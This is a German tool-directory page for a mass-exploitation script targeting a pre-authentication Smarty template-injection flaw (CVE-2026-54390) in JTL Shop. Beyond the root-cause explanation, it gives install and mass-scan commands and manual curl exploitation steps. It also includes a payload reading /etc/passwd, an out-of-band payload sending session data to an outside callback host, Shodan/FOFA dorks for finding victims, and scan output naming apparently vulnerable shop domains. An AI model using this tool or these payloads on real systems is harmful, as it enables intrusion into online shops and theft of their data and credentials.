Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-54390 — CVE-2026-54390 — JTL Shop Smarty SSTI RCE | Pre-Auth Template-Injection über fetch('string:' . ) | 5.2.0-5.7.1 | Kitploit
Tools/GitHubGitHub/shinthink/cve-2026-54390
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubshinthink/cve-2026-54390

CVE-2026-54390

CVE-2026-54390 — JTL Shop Smarty SSTI RCE | Pre-Auth Template-Injection über fetch('string:' . ) | 5.2.0-5.7.1

Repository anzeigen
vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-54390 — JTL Shop Smarty-SSTI-Massenexploit

Pre-Auth-Kontaktformular → E-Mail-Betreff → fetch('string:') → RCE


Überblick

CVE-2026-54390 ist eine kritische (CVSS 9.8) nicht authentifizierte Server-Side Template Injection in JTL Shop 5.2.0–5.7.1.

Die Methode SmartyRenderer::renderTemplate() übergibt E-Mail-Betreffzeilen an $smarty->fetch('string:' . $subject) und rendert sie als Smarty-Templates. Benutzerfelder des Kontaktformulars gelangen über die #var#-Auflösung in parseSubject() in den E-Mail-Betreff und werden anschließend von fetch() erneut ausgewertet.

Text::filterXSS() entfernt nur HTML-Tags — { und } werden durchgelassen. Registrierte Smarty-Modifikatoren umfassen file_get_contents und unserialize.

Betroffene Versionen

JTL ShopStatus
< 5.2.0Nicht betroffen
5.2.0 – 5.3.xVerwundbar (Diebstahl von Zugangsdaten)
5.4.0 – 5.7.1Verwundbar (vollständige RCE)
5.5.4 / 5.6.2 / 5.7.2+Behoben

Verwundbarkeitsmechanismus

Grundursache

root@kitploit:~
// includes/src/Mail/Renderer/SmartyRenderer.php line 63
$subject = $this->parseSubject($model->getSubject($languageID));
$template->setSubject($this->getSmarty()->fetch('string:' . $subject));
//                       ^^^^^^^^^^^^^^^^^^^^^
//                     Email subject rendered as Smarty template

Angriffsablauf

root@kitploit:~
1. User fills contact form → name/email/message → filterXSS()
2. filterXSS only strips HTML — {system()} passes through
3. Email subject template: "Neue Anfrage von #Kunde.vorname#"
4. parseSubject() resolves #Kunde.vorname# → {system('id')}
5. fetch('string:Neue Anfrage von {system(\'id\')}') → EXECUTES
6. Email sent with subject: "Neue Anfrage von uid=33(www-data)..."

Registrierte Smarty-Modifikatoren

root@kitploit:~
// PluginCollection.php — available for RCE
'unserialize', 'file_get_contents', 'file_exists', 'class_exists'

Installation

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-54390.git
cd CVE-2026-54390
pip install -r requirements.txt

Verwendung

root@kitploit:~
# Single target
python cve_2026_54390.py -t target.com

# Mass scan
python cve_2026_54390.py -f jtl-targets.txt -o vuln.txt

# SSTI probe via contact form
python cve_2026_54390.py -t target.com --exploit --debug

Argumente

root@kitploit:~
  -t, --target      Single target (domain or IP)
  -f, --file        Target list, one per line
  -o, --output      Save vulnerable targets
  --threads         Workers (default: 20)
  --exploit         Submit SSTI probe via contact form
  --debug           Show every HTTP request
  -v, --verbose     Detailed output

Proof of Concept

Erkennung

root@kitploit:~
$ python cve_2026_54390.py -t jtl-shop.de --debug
root@kitploit:~
  JTL Shop Smarty SSTI | CVE-2026-54390

  [jtl-shop.de] JTL Shop v5.7.0
  [jtl-shop.de] [+] JTL Shop v5.7.0
  [jtl-shop.de] contact form: /Kontakt | subjects:5

  Host       : jtl-shop.de
  JTL Shop   : YES v5.7.0
  Contact    : YES
  Form path  : /Kontakt
  Subjects   : 5 available

Massen-Scan

root@kitploit:~
  [!] business.trustedshops.ch   1.6s  v5.5.2  form:/Kontakt
  [!] bmg-moebel.de              5.3s  v5.7.0  form:/Kontakt
  [100/5600] 1%  |  JTL:23  Vuln:12

Manuelle Ausnutzung

Schritt 1 — Kontaktformular und Token finden

root@kitploit:~
curl -sk 'https://target.com/Kontakt' | grep -oP 'name="jtl_token"[^>]*value="\K[^"]+'

Schritt 2 — SSTI-Test senden

root@kitploit:~
curl -sk -X POST 'https://target.com/Kontakt' \
  -d 'kontakt=1' -d 'subject=1' \
  -d 'nachricht={7*7}' \
  -d 'vorname={7*7}' \
  -d 'nachname={7*7}' \
  -d '[email protected]'

Schritt 3 — Dateien lesen

root@kitploit:~
{{"/etc/passwd"|file_get_contents}}

Schritt 4 — OOB-Exfiltration

root@kitploit:~
{{"http://callback.com/?s="|file_get_contents|cat:$smarty.session|replace_delim:":"}}

FOFA / Shodan

root@kitploit:~
FOFA:   body="jtl" && body="kontakt"
Shodan: http.html:"jtl" http.html:"Kontakt"

Haftungsausschluss

NUR FÜR BILDUNGSZWECKE UND AUTORISIERTE TESTS. Die Autoren übernehmen keine Haftung für Missbrauch.


Referenzen


Nicht mit JTL-Software oder Sansec verbunden.

Tool herunterladen
Ressource
Link
Sansec Researchsansec.io/research/jtl-shop-ssti-rce
IONIX Advisoryionix.io/threat-center/cve-2026-54390
JTL Forumforum.jtl-software.de
NVDCVE-2026-54390